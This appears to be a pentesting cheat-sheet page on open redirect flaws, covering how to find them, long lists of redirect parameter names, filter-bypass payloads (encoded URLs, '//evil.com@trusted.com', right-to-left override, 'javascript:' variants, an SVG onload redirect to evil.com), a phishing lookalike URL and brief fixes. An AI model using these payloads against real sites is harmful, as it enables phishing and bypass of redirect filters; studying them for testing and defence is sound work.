Open Redirect
Open Redirect (also known as Unvalidated Redirects and Forwards) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.
Last updated
Was this helpful?
Open Redirect (also known as Unvalidated Redirects and Forwards) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.
Last updated
Was this helpful?
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Open Redirect (also known as Unvalidated Redirects and Forwards) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.
Burp Proxy history & Burp Sitemap (look at URLs with parameters)
Google dorking. E.g: inurl:redirectUrl=http site:target.com
Functionalities usually associated with redirects:
Login, Logout, Register & Password reset pages
Change site language
Links in emails
Read JavaScript code
Bruteforcing
Look for hidden redirect parameters, for e.g.:
/redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}
/?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}
Alert box popping up
Try using the same parameter twice: ?next=whitelisted.com&next=google.com
If periods filtered, use an IPv4 address in decimal notation http://www.geektools.com/geektools-cgi/ipconv.cgi
Try a double-URL and triple-URL encoded version of payloads
Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
For XSS, try replacing alert(1) with prompt(1) & confirm(1)
If extension checked, try ?image_url={payload}/.jpg
Try target.com/?redirect_url=.uk
(or [any_param]=.uk
). If it redirects to target.com.uk, then itβs vulnerable! target.com.uk and target.com are different domains.
Use /U+e280 RIGHT-TO-LEFT OVERRIDE: https://whitelisted.com@%E2%80%AE@moc.elgoog
The unicode character U+202E changes all subsequent text to be right-to-left
Many applications use redirection parameters like:
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://www.verylazytech.com
data=https://www.verylazytech.com
qurl=https://www.verylazytech.com
login=https://www.verylazytech.com
logout=https://www.verylazytech.com
ext=https://www.verylazytech.com
clickurl=https://www.verylazytech.com
goto=https://www.verylazytech.com
rit_url=https://www.verylazytech.com
forward_url=https://www.verylazytech.com
@https://www.verylazytech.com
forward=https://www.verylazytech.com
pic=https://www.verylazytech.com
callback_url=https://www.verylazytech.com
jump=https://www.verylazytech.com
jump_url=https://www.verylazytech.com
click?u=https://www.verylazytech.com
originUrl=https://www.verylazytech.com
origin=https://www.verylazytech.com
Url=https://www.verylazytech.com
desturl=https://www.verylazytech.com
u=https://www.verylazytech.com
page=https://www.verylazytech.com
u1=https://www.verylazytech.com
action=https://www.verylazytech.com
action_url=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
sp_url=https://www.verylazytech.com
service=https://www.verylazytech.com
recurl=https://www.verylazytech.com
j?url=https://www.verylazytech.com
url=//https://www.verylazytech.com
uri=https://www.verylazytech.com
u=https://www.verylazytech.com
allinurl:https://www.verylazytech.com
q=https://www.verylazytech.com
link=https://www.verylazytech.com
src=https://www.verylazytech.com
tc?src=https://www.verylazytech.com
linkAddress=https://www.verylazytech.com
location=https://www.verylazytech.com
burl=https://www.verylazytech.com
request=https://www.verylazytech.com
backurl=https://www.verylazytech.com
RedirectUrl=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
ReturnUrl=https://www.verylazytech.com
If these parameters are processed without validation, they might be vulnerable.
Check URL parameters β Look for redirect-related keywords in URLs.
Analyze HTTP responses β Look for 302 Found or 301 Moved Permanently responses.
Check developer console (F12) and network traffic β Inspect redirects.
Modify the URL and inject external domains:
https://example.com/login?redirect=https://evil.com
Using Burp Suite's Intruder to fuzz redirection parameters.
Using tools like Oralyzer:
python3 oralyzer.py -u "https://example.com?redirect="
If an application blindly trusts user input, you can redirect a victim to a malicious website:
https://example.com/login?redirect=http://evil.com
or use encoded URLs:
https://example.com/login?redirect=%68%74%74%70%3a%2f%2fevil.com
If an application allows redirection to localhost:
https://example.com/login?redirect=http://127.0.0.1
It can be used to:
Redirect an admin panel login to an internal resource.
Exploit internal APIs (in SSRF attacks).
Some applications attempt to restrict external domains but allow different URL formats:
https://example.com/login?redirect=//evil.com
https://example.com/login?redirect=//evil.com@trusted.com
//evil.com
is a shorthand for https://evil.com
.
@trusted.com
is ignored by some browsers.
Some browsers allow JavaScript-based redirects if improperly filtered.
javascript:alert(1)
or bypassing javascript
filters:
java%0d%0ascript%0d%0a:alert(0)
javascript://sub.domain.com/%0Aalert(1)
javascript://%250Aalert(1)
javascript://%250A1?alert(1):0
Some applications allow uploading SVG files that can trigger JavaScript execution:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://evil.com'" xmlns="http://www.w3.org/2000/svg">
</svg>
If the website automatically loads SVG files, the redirection will be triggered.
Attackers can craft realistic-looking URLs to trick users:
https://bank.com?redirect=https://bank.com.evil.com
Users might not notice the difference and enter their credentials.
Run the tool:
python3 oralyzer.py -u "https://example.com?redirect="
Only allow whitelisted domains for redirection:
allowed_domains = ["mysafedomain.com"]
if parsed_url.netloc not in allowed_domains:
return "Invalid redirect URL"
Instead of:
header("Location: ".$_GET['redirect']);
Use:
header("Location: /dashboard");
Ensure the redirect URL starts with a trusted domain:
if (!preg_match("/^https:\/\/mysafedomain\.com/", $_GET['redirect'])) {
die("Invalid redirect URL");
}
.Net
response.redirect("~/mysafe-subdomain/login.aspx")
Java
response.redirect("http://www.verylazytech.com");
PHP
<?php
/* browser redirections*/
header("Location: http://www.verylazytech.com");
exit;
?>
Learn & practice For the OSCP.